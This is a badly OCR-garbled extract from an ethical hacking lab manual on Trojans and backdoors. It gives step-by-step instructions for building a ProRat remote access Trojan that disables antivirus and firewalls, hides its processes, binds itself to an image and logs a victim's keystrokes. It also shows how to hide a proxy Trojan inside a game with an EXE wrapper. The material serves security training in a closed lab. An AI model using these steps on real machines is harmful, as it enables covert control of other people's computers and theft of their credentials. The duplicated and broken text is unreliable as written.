CEH Lab Manual
Trojans and Backdoors M odu l e 06 06
Module 06 - Trojans and Backdoors
Troja Tr ojans ns and B a ckd oo rs A Troja Trojan n is a progr program am that tha t con conttains ains a mali maliciou ciouss or harmful code ins insid idee appar apparen enttly harmless programming or data in such such a iray tha th a t it can can get ge t control control and an d cause cause damag damage, e, such as mining min ing the file all allocat ocatiion tabl able on on a hard hard dri drive. ve. ICON
KEY
1^ ~ ! Valuable information Test t o u t ______ __ knowledge ____ m
Web exer exercis cisee Workbook review
Lab Sce nario nari o According to Bank Into Security News (http://www.bankinfosecurity.com ( http://www.bankinfosecurity.com), ), Trojans pose serious risks tor any personal and sensitive information stored 011 compromised Android devices, the FBI warns. But experts say any mobile device is potentially at risk because the real problem is malicious applications, which 11 111 an open en vironm ent are impossible to control. And anywhere malicious apps are around, so is the potential for financial fraud. According to cyber security experts, the banking Trojan known as citadel, an advanced variant of zeus, is a keylogger that steals online-banking credentials by capturing keystrokes. Hackers then use stolen login IDs and passwords to access online accounts, take them over, and schedule fraudulent transactions. Hackers created tins Trojan that is specifically designed for financial fraud and sold 011 the black market. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, the theft o f valuable valuable data from the network, and identity theft. theft.
Lab O bjectives bjectives The objective of tins lab is to help students learn to detect attacks.
Trojan
and
backdoor
The objective of the lab include: ■ Creating a server and testing a netw ork for attack attack ■ Detecting Trojans and backdoors ■ Attacking a netw ork using sample Trojan s and doc um enting all all vulnerabilities and flaws detected &
T o o ls
demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors
Lab E nvi nvironment ronment To carry out tins, you need: need: A computer mnning Window 7
Window Server Server 2008
as Guest-1 in virtual machine
mnning as Guest -2 in virtual machine
A web browser with Internet acce access ss ■ Administrative Admin istrative privileges privileges to ni n tools
CEH L ab Manual Page 425 425
Ethica l Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Lab Duration Time: 40 Minutes
Ov erview of Trojans Trojans and Backdoors A Trojan is a program that contains malicious or harm till till code cod e inside apparently harmless programming 01 data 11 111 such a way that tha t it can get control and cause damage, such as mining die file allocation table 011 a hard disk. With the help of a Trojan, an attacker gets access to s t o r e d p a s s w o r d s in a computer and would be able to read personal documents, delete files, display pictures, and/01 show messages 011 the screen.
Lab Task Task s TASK
1
Overview
Pick an organization diat you feel feel is is worthy o f your attention. Tins could be an educational institution, a commercial company, 01 perh aps a no np npro rotit tit chanty. chan ty. Recommended labs to assist you widi Trojans and backdoors: ■
Creating a Server Using the ProRat ProR at tool
■
Wrapp ing a Trojan Using On e File File EX E Maker
■
Proxy Server Trojan Troj an
■ HT TP Trojan ■
Remote Access Trojans Using Atelier Web Remote Com mand er Detecting Trojans Creating a Server Server Using the Theet Thee t
■ Creating a Server Using Usin g the Biodox ■ Creating a Server Using Usin g the MoSucker MoSu cker Hack Windows 7 using Metasploit
Lab An alysis alysis Analyze and document the results related to the lab exercise. Give your opinion 011 your target’s target’s security security posture postur e and exposure diroug d iroug h public and tree information.
P L E A S E T A LK T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L AB AB .
CE H Lab M anual Page 426 426
Ethica l Ha ckin g and Cou ntem ieasures Copyrigh Copyrightt © by EC-Council EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Lab
Creati Creatin g a Serv er Using Using th e ProRat Tool A Troj Trojan is a progra program m that cont contains ains mal maliciou ciouss or harmful harmful co code insi inside de appare apparent nt//) harmless programming or data in such a way that it can get control and cause damage damage,, such as mining min ing the file all allocat ocatiion tabl tablee on on a hard hard drive rive.. ICON
Lab Scenario
KEY
1^7 Valuable information
As more and more people regularly use die Internet, cyber security is becoming more important for everyone, and yet many people are not aware of it. Hacker are using malware to hack personal information, financial data, and business information by infecting infecting systems systems with viruses, viruses, worms, and Trojan horses. But Internet security is not only about protecting your machine from malware; hackers can also sniff your data, which means that the hackers can listen to your communication with another machine. Other attacks include spoofing, mapping, and hijacking.
Test your knowledge =
Web exercise exercise
m
Workbook review review
Some hackers may take control of your and many other machines to conduct a denial-of-service attack, which makes target computers unavailable for normal busines bus iness. s. Ag ainst ain st hig h-p rofile rof ile web we b servers serv ers such suc h as ban ks and an d credit cre dit card gateways. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuab valuable le data from the network, and identity theft. theft.
Lab Objectives &
T o o ls
demonstrated in this lab are available in D:\CEHTools\CEHv8
The objective objective of tins tins lab is is to help suidents learn to d etect Trojan and backd oor attacks. The objectives of the lab include: ■
Creating a server and testing testing the netw ork for attack
■
Detecting Trojans and backdoors
Module 06 Trojans and Backdoors
CEH L ab Manual Page 427 427
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Attacking a network using sample Trojans ancl documenting all vulnerabilities and flaws detected
Lab Environment To earn tins out, you need: need: ■
The Pro rat tool located at D:\CEHD:\CEH-Too Tools\ ls\CEHv CEHv88 Module 06 Tro jans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat
■
A com puter runn running ing Windows Server 2012 as Host Machine
■
A com puter runn running ing Window 8 (Virtual (Virtual Machine)
■
Windows Serv er 200 2008 8 runnin g 111Virtual Machine A web brow ser with Intern et access access Administrative privileges to run tools
Lab Duration Tune: 20 Minutes
Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining die file allocation table on a hard drive. Note: Note : The T he versions ver sions o f the created c reated Client or H os t and an d appearan app earance ce o f the website webs ite may differ from w hat is 111 die lab, bu t the acmal process o f creating the the server and die client is the same as sho s hown wn 11 111diis 1d iis lab.
Lab Task Task s Create Server with ProRat
Launch Windows 8 Virtual Machine and navigate navigate to Z:\CEH Z:\CEHv8 v8 Module 06 Trojans and Backdoors\Trojans Types\Remote Types\Remote A ccess Trojans (RAT)\ProRat. 2. Dou ble-click Pro Ra t.ex e 111Win dow s 8 Virtual Machine.
Click Cre ate Pro Rat S erve r to start preparing to create create a server server.. 3. Click
CEH L ab Manual Page 428 428
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
P f l DHR CH. n E T F « OF OF E 55 55 I C] f >HL I f l TEHnET TEHnET !!! Connect English
PC Info
Applications
Message
Windows
Funny Stuff
File Manager
!Explorer
Search Files
Control Panel
Registry
Admin-FTP
Shut Down PC Clipboard
KeyLogger
Give Damage
Passwords
R. Downloder Printer Online Editor ProConnective Create Create Downloader Server (2 Kbayt) Create CGI Victim List (16 Kbayt)
^Help FIGURE 1.1: ProRat main window
appear ears. s. 4 . The Create Serve r window app Create Server ProConnective Notification (Network and Router) Supports Reverse Connection
Notifications 1y=J 1y=J Pass word button: Retrieve passwords passwords from many services, such as po p3 ac co un ts , m es se ng er , IE, mail, etc.
Test
Use ProConnective Notification IP (DNS) Address:
General Settings
»ou. no* no *1p.com
Mail Notification Doesn't support Reverse Connection
Bind with File
Test
Q Use Mail Mail Notification Notification E-MAIL:
[email protected]
Server Extensions
ICQ Pager Notification Doesn't suppoit Reverse Connection Q Use ICQ ICQ Pager Notificatio Notification n
Server Icon
ic q u i n
:
Test
[r]
CGI Notification Doesn't support Reverse Connection
W) Help
Test
Q Use CGI CGI Notification Notification w.yoursite. e. com/cgi-bin/prorat. cgi CGI URL: http: //w w w.yoursit
Server Size: Size:
r
Create Server
342 Kbayt
FIGU RE 1. 1.2: 2: ProRat Create Server Window
Click Gen eral Se ttin gs to change change feature features, s, such as Se rve r Port. Server 5. Click Passw ord, Victim Victim Name, and the Port Num ber you wish wish to connect over the connection you have to the victim or live the settings default.
6. Un check the highlighted optio ns as show n 111 the following screensho t.
C E H L a b M a n u a l P a g e 42 42 9
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Server Port: Server Password: Vict im Name: Name:
General Settings
Q Bind with File
Server Extensions
3ive a fake error error messag message. e.
Q
••1elt server on install.
Q
Cill AV-FW on start. start.
Q
disabl disable e Windows XP SP2 Security Security Cente Center r
I...... Q Disable Disable Windows XP Firewa Firewall. ll.
Server Icon
Q
Hear Hear Windows XP Restore Points Points..
Q
)on't send send LAN notifi notificati cations ons fro from m ( i 92.i 68.”.“j 68.”.“j or (10.*. (10.*.xx.xj .xj
I I Protection for removing Local Server Invisibility Q Hide Process Processes es from from All Task Managers Managers (9x/2k/X P)
Ity ! Note: you can use Dynamic DNS to connect over the Intern et by using using no-ip account registration registration..
Q Hide Values Values From From All All kind of Registry Registry Editors Editors (9x/2k/X P) Q Hide Names Names Fro From m Msconfig Msconfig (9x/2k/K P) Q UnT erminate erminate Process Process (2k/XP) Server Size: Size:
r
Create Server
342 Kbayt
FIG UR E 1. 1.3: 3: ProRat Create Server-General Settin Settings gs
7. 8.
Click Bind with File to bind bin d th e server w ith a file; file; 111 tins lab we are using the .jpg file to bind the server. Check
Bind server with a file.
Click
andnavigate navigate S e l e c t F i l e , and
to
Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Ty pes\Remote A c c e s s T r o j a n s ( R A T ) \P \P r o R a t\ t\ lm lm a g e s .
9. Select the
m Clipboard: To
Girl.jpg
file file to bind w ith the server. server.
read
data from random access memory.
This File will be Binded: Bind with File
Server Extensions
Server Icon
Server Size: Size:
Create Server
342 Kbayt
I------------------------------------------FIGU RE 1.4: 1.4: ProRat Binding with a file file
C E H L a b M a n u a l P a g e 43 43 0
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
10. Select Girl.jpg 111 the window and then clic clickk Open to bind the file.
Look in:
Images
11° £Q1 VNC V NC Trojan starts a VNC server daemon in the infected system. system.
File name:
Girl
Open Cancel
Files Files of typ e:
FIGURE FIG URE 1.5 1.5:: ProRat binding bind ing an image
11. Click OK after selecting the image for binding with a server.
£ 9 File File mana manage ger: r: To manage victim directory for add, delete, and modify.
12. 111 Server Extensions settings, select EXE (lias icon support) 111 S e l e c t Server Extension options.
CEH Lab Manual Page 43 431
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Select Server Extension
Notifications
^
EXE EXE (Has (Has icon suppo support) rt)
Q PIF (Has no icon support) support)
General Settings
Q
Q SCR SCR (Has (Has icon suppo support) rt) Q COM COM (Has no icon support) support)
BAT (Has (Has no icon suppo support) rt)
Bind with File
Server Extensions
Server Icon
£ Q Give Damage: Damage: To format the entire system files. Server Size:
r
Create Server
497 Kbayt
FIGURE 1. 1.77: ProRat Server Extensions Settings
13. 111 Server Icon select any of the icons, and click the Create Server but b ut to n at b ot to m right rig ht side o f th e P ro roRa Ra t wind w indow ow..
Notifications
General Settings
M Bind with File
Server Extensions
It connects to the victim using any VNC viewer with the password “secret.” m
H U 11
Server Icon
j J
V) Help Server Icon: Server Size:
Choose new Icon Create Server
497 Kbayt
I FIGURE 1.8: ProRat creating a server
14. Click OK atter the server has been prepared, as shown 111 the tollowing screenshot.
CEH L ab Manual Page 432 432
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
FIGURE 1.9: PioRat Server has created 111 die same current directory
15. Now you can send die server file by mail or any comm unication media to the victim’s machine as, for example, a celebration file to run. £ G SHTTPD is a small small HTTP server that can be embedded inside any program. prog ram. It can be wrapped with a genuine program (game cl1ess.exe). When executed, it turns a computer into an invisible web server.
Applicator Tools Tools Vicvr
E
Extra large icons S t Extra
fj fi Details pane
ft | M M5 5 d u n ico n s
S
A&
Man ag e
m Preriew pane
Lirt
Large icons || j Small Small ico n s |j
Details
t N" ₪
□
Item check boxes boxes
□
Filen ame ex ten sio sio n s
I I Hi dden items
______________ ______________ Layout _________ _________
o
©
^
Show/hide
« Trcjan Trcjanss Types Types ►Femote ►Femote Access Access Troj Trojan anss (RAT)
A K Favorites
*.
J . D o w n l ea ea d
D es es kktt op op
Ir Irrraces aces
£ Do wn lo ad ad }
J . L a n g u a ge ge
■
1
|^
1S3J S3J Rec ent pl aces
b n d e d ..ss e r v er er |
^ 1F n gl gl i sh sh £
raries es 1^ f Lib rari
P ro ro Ra Ra t
F*| F*| Do cu m tn te
j__ Re ad me
J* Music
^ T
f c l P i c t u «c
|__ Version.Renewals
rk 6 h
Qj Videos
Homegrojp
Computei sL , Local Disk O
5 ? CE CEHH-To To o ls (\\1 a
^( ^(11 Netwo rk 9 items
v
1 item selected 2 0 8 M MB B
FIGURE 1.10: ProRat Create Server
16. Now go to Windows Server 2008 and navigate to Z:\CEHv8 Module 06 Trojans Trojans and and Backdoors\Trojans Typ es\Remo te A cc es s Trojans Trojans (RAT)\ProRat.
17. Double-click binder_server.exe as shown 111 the following screenshot.
CEH L ab Manual Page 433 433
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reprodu ction is Strictly Prohibited.
Module 06 - Trojans and Backdoors
p
. El•
id t
|
T 0J%n(Trt>« » Rencte Acr« s "roiflr s RAT(
^•w
Tjolc
* PraRat
ital
t#lp
View
Oroanize ▼ •
M t Tavoi ite -» ks
I•I Site
^
0° *°
T"T ™----------------- Pate modifi odified— ed—
H
i | r>ornn#ntc ?1 cajres
£ ^
Music More
»
Folders Botnet 'rojars J i Botnet
I
^
[^ uHoct
j j
j , Ya5»cn_R.c «n o 5
Comnand Shell ~r 0)s
I
Defacene nt ro;ars
I
J4 Destnjave T'ojan T'ojanss
I
[ : R e ad ad ne ne
v
I
Ebandng Trojans
I J4 E-Mal T0 j3ns I JA FTP Trojar I
GUITrojors
I
HTTPHI PS "rpjars
I
S
ICMP Backdoo Backdoor r
I J4 MACOSXTrojons I J i Proxy Server Trojan: . Remote Remote Acces Accesss “rcj?“rcj?- * I
J . Apocalypse
I
4 . D*fk D*fkCo Cor«tRAT
I
j.. ProRat
X Atelie Web Remji
I £
. VNC’rojans C’rojans M ar ar l
H
C
S.
. New Text Docu nei l • No... I
‘
-O g*
FIGURE FIG URE 1.11: 1.11: ProRat Windows Server 2008
ICMP Trojan: Covert channels are methods in which an attacker can hide data in a protocol diat is undetectable.
18. 18. Now No w switch to Windows 8 Virtual Machine and enter the IP address o f Windows Windows Server 200 8 and the live port number as the default 111 the ProRat main window and click click Connect. 19. 19. 111 tins lab, the IP address addres s o f Windows Wind ows Server 2008 is (10.0.0.13) (10.0.0.13) Note: IP addresses might be differ F
T
classroom labs
111
P ro ro R at at V1 .9 .9
mum PC In Info
-
Poit
Applications
Message
Windows
Chat
Adm Admin-FT in-FTP P
Funn Funny y Stu Stuff ff
File ile Man Manag ager er
!Explorer
Searc arch Fil Files
Contro trol Panel
Registr istry y
Shut Down PC Screen Shot Clipboard
KeyLogger
Give Damage
Passwords
R. Downloder Printer
Services
Online Editor ProConnective Create
FIGURE 112: ProRat Connecting Infected Infecte d Server
20. Enter the password you provided at the time ol creating the server and click OK.
CEH L ab Manual Page 434 434
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
|-| Typ Typ |-
Module 06 - Trojans and Backdoors
Password:
OK
Cancel
FIGURE 1.1 1.13: 3: ProRat connection window
21 21.. No w you are are c o n n e c t e d to the victim machine. machine. To test the connection, click PC Info and choose the system information as 111 the following figure. BfP > > — P ro R a tV o n n e c te d [10.0.0.13^^^HBBB^^^^^r - x1 1.9 IC P P D H P C H . n E T P P O F E 5 5 I C 1 n F I L i n T E R r i E T !! !!! Covert channels rely on techniques called tunneling, which allow one protocol to be carried carried over over another protocol.
Poit: g m
m
IB
English
PC In Info
Applications
Message
Windows
r
Disconnect
//////// PC Information ////////
C o m p u t e r Name U se r Na me Chat Admin-FTP Windows Uer Funn Funnyy Stu Stuff ff File Man Manag ager er W in in do do ws ws La La ng ng ua ua ge ge W i n d o w s Pat h !Explore lorerr Searc earch h Fi Files S y s t e m Pat h Contro trol Panel Registr istryy Temp Path Shut Down PC Screen Shot Productld KeyLogger Clipboard Work gro up Give Give Dama Damage ge Pass Passwo word rdss Da ta R. Downloder
Run
Printer
Services
Onlin Online e Edito Editorr
F'roC F'roCon onne nectiv ctive e
l
Create Pc information Received.
10
WI N - E G B H I S G 1 4 L 0 Adm in i st r at o r E ng ng li li sh sh ( Un Un it it ed ed St St C :\ :\W i nd ow s C :\ :\ Wi n d o w s\ s y s t e m c C:\Users\ADMINI~1\ NO 9/ 2 3/20 12
-L System Information
Mail Address in Registry
Last visited 25 web sites
W; Help
FIGURE 1.14 1.14:: ProRat connected computer wid ow
22. Now click KeyLogger to steal user passwords for the online system. m
TASK
2 [ r ? ~ ^ r o R a ^ 7 ^ o n n e c t e d n 0 l0 l0 ^ 3 r ~ P H □ H R C H .
Attack System Using Keylogger
E T P P G re S S ID n P L
P011: g n i R:
ip: Q j Q 2
in T E P riE T
!!!
I I 111 h
Disconnect
//////// PC Information //////// PC In Info
Applications
Message
Windows
C o m p u t e r Name U se r Na me Chat Admin-FTP Windows Uer Funny unny Stuf Stufff File Man Manag ager er W in in do do ws ws La La ng ng ua ua ge ge W i n d o w s Pat h !Explor lorer Searc earch h Fi Files S y s t e m Pa Pat h Contro trol Panel Registr istryy T em p Path Shut Shut Down Down PC PC Screen Screen Sho Shott Productld Clipboard KeyLogger Workgroup Give Give Damag amage e Pass Passwo word rdss Da ta R. Downloder
Run
Printer
Services
Online Editor ProConnective Create Pc information Received.
WI N - E G B H I S G 1 4 L 0 Adm in i st r at o r E ng ng li li sh sh ( Un Un it it ed ed St St C :\ :\W i nd ow s C :\ : \ W i n d o w s \ s y sterna C:\U s er s \A D HI NI ~ 1\ NO 9/ 2 3/20 12
Li. System Information
Mail Address in Registry
Last visited 25 web sites
W; Help
FIGURE 1.15: ProRat KeyLogger button
CEH L ab Manual Page 435 435
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reprodu ction is Strictly Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
23. The Key Logger window will appear.
works m Tliis Trojan works like a remote desktop access. access. The T he hacker gains complete GUI access of the remote remo te system: ■ Infect victim’s victim’s computer with server.exe and plant Reverse Connecting Trojan. ■ The Troja Trojan n connect connectss to victim’s Port to the attacker and establishing a reverse connection. ■ Attacker Attacker then has has complete control over victim’s machine.
FIGURE 1.1 1.16: 6: ProRat KeyLogger window window
24. Now switch to Windows Server 2008 machine and open a browser or N otep ot ep ad and type any text. i T e x t
File
Hi
Edit
D o c u m e n t - N o t ep ep a d
Format
View
Help
there
T h i s i s my u s e r n a m e : x y z @ y a h o o . c o m p a s s w o rd : te st <3 @ #S !@ l|
Trojan s are m Banking Trojans program that that steals steals data data from infected computers via web browsers and protected storag storage. e.
Ik.
A FIGURE 1.1 1.17: 7: Test typed in Windows Windows Server 2008 2008 Notepad
25. W hile the victim is writing a m e s s a g e or entering a user name and pas sw or ord, d, y ou can cap mre mr e the log entity. 26. Now switch to Windows 8 Virtual Machine and click Read Log from time to time to check for data updates trom the victim victim machine.
CEH L ab Manual Page 436 436
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
E =9/23/201211:55:28 PMPMahi bob this is my usemame;xyzatyahoo.com password; password; testshiftl buttow ithl shiftbuttonwith2 shiftbuttonwith2
|
Read Log
|
Delete Log
L•^L1 •^L 1 — UL 1 !_•
11•_t 1
Save as C□
Clear Screen
Help
1----------------------------------------------
|Key Log Received. Received.
|
FIGURE 1.1 1.18: 8: ProRat KeyLogger window
27 27..
No w you can use a lot o f feauires feauires from ProR at on the victim’s victim’s machine. machine.
Note: ProRat Keylogger will not read special characters.
Lab An alysis alysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s secunty posture and exposure dirough public and free information.
P L E A S E T AL A L K T O Y O U R I N S T R U C T O R I F Y OU OU H A V E Q U E S T I O N S RELATED TO THIS LAB.
Questions 1. Create a server server wk h advanced options such as Kill Kill AV-FW AV -FW on start, start, disable disable Window s XP Firewal Firewall, l, etc., etc., send it and con nect it to the th e victim machine, and verify whedier wh edier you can communicate commu nicate with the victim machine. 2. Evaluate and examine various mediods to co nnect to victims victims if diey are 111 odier odie r cities cities o r countries.
CEH L ab Manual Page 437 437
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
T o o l/ l/ U t il il i t y
I n fo fo rm rm a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed Successful creation of Blinded server.exe O utpu t: PC Informat Information ion Comp uter NameAY IN-EGBHISG 14LO 14LO User Name: Administrator W indo ws Yer:
ProRat Tool
Windows Language: English (United States) W indows Path: c:\windows System Path: c:\windows\system32 Temp Pat Path: c:\Users\A D M IN I~l\ Product ID: Workgroup: Workgrou p: N O Data: Data: 9/23/201 2
Internet Connection R equired □ Y es
0 No
Platform Supported 0 C l as as s ro ro o m
CEH L ab Manual Page 438 438
0 !Labs
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
L ab
Wrapp Wrapping ing a Troja Tro jan n Using One File EXE Maker Mak er A Trojan is aprogram that contains malicious or harm harmfful code inside apparently harmless pr programming or dat data in su such a way that it canget controland and cause damag damage, e, such as minin mining g the file file al allocation table on a hard ard drive. ICON
Lab Scenario
KEY
£17 Valuable information Test your knowledge Web exercise Workbook review review
Sometimes an attacker makes a very secure backdoor even more safer than the normal way to get into a system. system. A no rmal user may use only one passw ord for using the system, but a backdoor may need many authentications or SSH layers to let attackers use the system. Usually it is harder to get into the victim system from installed backdoors compared with normal logging 111. After getting control of the victim system by an attacker, the attacker installs a backdoor on the victim system to keep 111s or her access in the future. It is as easy as running a command on the victim machine. Another way the attacker can install a ba ckdo ck do or is using usi ng ActiveX Act iveX . Wlien Wl ieneve eve r a user us er visits visit s a webs we bsite, ite, em bedd be dd ed ActiveX could run on the system. Most of websites show a message about running ActiveX for voice chat, downloading applications, or verifying the user. 111 orde r to pro tect your system from attacks by Trojan s and need extensive knowledge on creating Trojans and backdoors and protecting the system from attackers. You are a security security administrator o f your company, and your job responsibil responsibiliti ities es include include protecting the network from Trojans and backdoors, Tro jan attacks, attacks, theft o f valuab valuable le data from the network, and identity theft. theft.
& T o o ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
CEH L ab Manual Page 439 439
Lab Objectives The objective objective of tins lab lab is to to help smdents learn to de tect Trojan and backdoor attacks. The objectives of the lab mclude: ■
Wrap ping a Trojan with a game 111 Windows Server 2008
■
Runn ing the Troja n to access the game on the fron t end
Ethica l Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
■
Analyzing the Troja n runn ing in backend
Lab Environment To carry out diis, you need: OneFileEXEMaker tool located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backdoors\Wrapper Covert Programs\OneFileExeMaker
■
A compu ter running Window Window Server 2012 (host) Windows Server 200 8 runn running ing in virtual machine
■ It you decide to dow nload the the latest version, then screenshots shown 111 the lab might differ ■
Administrative Admin istrative privileges privileges to run tools
Lab Duration Tune: 20 Minutes
Ov erview of Trojans Trojans and and Backdoors A Trojan is a program diat contains malicious or harmful code inside apparendy harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die hie allocation table on a hard drive. Note: The versions of die created client or host and appearance may ditfer from
what is 111 die lab, but die actual process of connecting to die server and accessing die processes is same as shown 111 dus lab. H
TASK
1
OneFile EXE Maker
Lab Task Task s 1. Install OneFileEXEMaker on Windows Server 2008 Virtual Machine. Senna Spy One EXE Mak er 2000
2.0a
Senn a Spy Spy One EXE Maker 2000 - 2.0a Official Website: e-mail:
http://sennaspy.tsx.org
senna_spy0 holma1l.com
ICQ UIN
3973927
Join many files and make a unique EXE file. This piogram allow join all kind of files: exe, dll. ocx. txt, jpg. bmp Automatic OCX file register and Pack files support Windows 9x. NT and 2000 compatible ! Short File Name
Parameters
10 pen Mode | Copy To
Command Line Parameters.
m
Copyright (C). 1998-2000. By Senna Spy
Open Mode C Normal C Maximized C Minimized C Hide
Copy To-----(“ Windows C System C Temp C Root
| Act ion
Action-----C Open/Execute C Copy Only
r
Pack Pack Fies? Fies?
FIGURE 3.1: OneFile EXE Maker Home screen
CEH L ab Manual Page 440 440
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Click die Add File butto bu ttonn and browse brow se to the CEHCE H-To Tools ols folder at die location Z:\CEHv8 Module 06 Trojans and Backdoors\Games\Tetris and add die Lazaris.exe hie. Senna Spy One EXE EXE Make r 2000 - 2.0a
Senn a Spy Spy One EXE Maker 2000 - 2.0a Official Website:
less! less! You can set various tool options as Open mode, Copy to, Action
e-mail:
http://sennaspy tsx http://sennaspy tsx org
senna_spy@hotma 1l.com
ICQ UIN
3973927
Join many files and make a unique EXE file. This program allow join all kind of files: exe. dll, ocx. txt, jpg, bmp . Automatic OCX file register and Pack files support Windows 9x. NT and 2000 compatible ! [ s h o r t F ile Name
| P a r a m e t e rs
| 0 p e n M ode |C o py To
LAZA RIS.EXE
H id e
System
| A c ti o n
!
Add Fie
| O p e n /E xe cu t e Getete
1
Save Ejj* Command Line Parameters
O pe pe n Mo de de
Cop y T0 -----
C Normal Copyright (C). 1998-2000. By Senna Spy
C Windows r Maximiz Maximized ed (* System C Minimized C Temp (5 Hide C Root
(• Open/Execute C Copy On|y
FIGURE 3.2: Adding Lazaris game
3. Click
Add File and browse to the CEH-Tools folder at die location Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans and add die mcafee.exe file.
Senna Spy One EXE Maker 2000 - 2.0a Official Website: e-mail:
& T o o ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
http://sennaspy.tsx.org
[email protected]
ICQ UIN
3973927
Join many files and make a unique EXE file. This program program allow join all kind of files: exe. dll. ocx. txt, jpg. bmp Automatic OCX file register and Pack files support Windows 9x. NT and 2000 compatible I Short File Name
Parameters
| Open Mode | Copy To
|Actio n
System
Open/Execute
ISystem
|Open/Execute
Add Fie
delete Save
Command Line Parameters
Copyright |C|, 1998-2000. By Senna Spy
O pe pe n Mo de de C Normal C Maximized C Minimized (* Hide
Cop y To!-----
C Windows (* System Temp
Action-----(• Operv Execute C Copy Only
r
P a ck ck F ie ie s ?
C Root
FIGURE 3.3: Adding MCAFEE.EXE proxy server
4. Select Mcafee and type 8 0 8 0 111 die Command Line Parameters field.
CEH Lab Manual Page 44 441
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Senna Spy One EXE Mak er 2000
2.0a
Senna Spy Spy One EXE Maker 2000 2000 2.0 2.0 a Official Web site e-mail:
http ://sennaspy tsx org
[email protected]
ICQ UIN:
3973927
Join many files and make a unique EXE file. This piogram allow !oin all kind of files: exe. dll. ocx. txt. jpg. bmp Automatic OCX file !egistei and Pack files support support Windows 9x. NT and 2000 compatible ! Short File Name
Paiameters
Open Mode Copy To
LAZARIS.EXE
System
Action Open/Execute Open/Execute
Save Command Li ne Parameters
Copyright (C). 1998-2000. By Senna Spy
Open Mode— C Normal C Maximized C Minimized ^ Hide ide
Copy To-----C Windows (* System Temp C Root
Open Open/Ex /Exec ecut ute e
“ P*k Fles?
C Copy On|y
FIGURE 3.4: Assigning port 8080 to MCAFEE
5.
Select Lazaris and check die Normal option in Open Mode. Senna Spy One EX£ EX£ Mak er 2000
2.0a
Senn a Spy One EXE Maker 2000 2000 2.0 a Official Web site: e-mail:
http ://sennaspy tsx org
[email protected]
ICQ ICQ UIN
39/3927
Join many files and make a unique EXE file. This piogram allow join all kind of files: exe. dll. ocx. txt. jpg. bmp ... Automatic OCX file register and Pack files support Windows 9x. NT and 2000 compatible ! Add Fie LAZA RIS.EXE MCAFEE EXE
N otm a l 8 08 08 0
H id id e
(S ystem
I O p e n /E x e c u te I
Sys te te m
O pe pe n/ n/ Ex Ex ec ec ut ut e
Delete
Save Exit Open Mode
Command Li ne Parameters
: p.0 1 ™
. Jaximiz Jaximized ed 1 Maximize
^ © 2 Copyright g ht (C). (C). 1998 2000. By Senna Spy Spy
C Minimized C Hide
Copy To-----C Windows <• System C Temp C Root
Action (• Operv Execute C Copy On|y
